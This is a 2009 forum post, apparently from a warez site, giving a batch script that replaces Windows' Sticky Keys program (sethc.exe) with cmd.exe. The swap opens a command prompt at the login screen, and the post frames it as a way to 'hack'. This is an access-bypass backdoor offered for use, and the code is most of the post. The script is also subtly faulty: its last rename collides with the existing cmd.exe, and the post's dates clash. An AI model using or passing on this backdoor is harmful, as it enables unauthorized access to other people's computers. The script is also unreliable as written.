| How to change sticky keys for cmd - this is a bat file code -
03-30-2009, 03:50 AM
First open notepad copy this code:
@echo off
title Cmd for Sticky
TAKEOWN /F C:\Windows\System32\sethc.exe
ATTRIB C:\Windows\System32\sethc.exe +r
TAKEOWN /F C:\Windows\System32\cmd.exe
ATTRIB C:\Windows\System32\cmd.exe +r
RENAME C:\Windows\System32\sethc.exe sethc2.exe
COPY C:\Windows\System32\cmd.exe C:\Windows\cmd.exe
RENAME C:\Windows\cmd.exe sethc.exe
COPY C:\Windows\sethc.exe C:\Windows\System32\sethc.exe
RENAME C:\Windows\System32\sethc.exe cmd.exe
echo Made by warez-kingz.net
pause
and save it as sticky.bat
run it...
now on login you press shift 5 times and a command prompt comes up...
now you can hack...
Link checked on Wed Jan 23, 2008 4:20 pm [enigma86]
|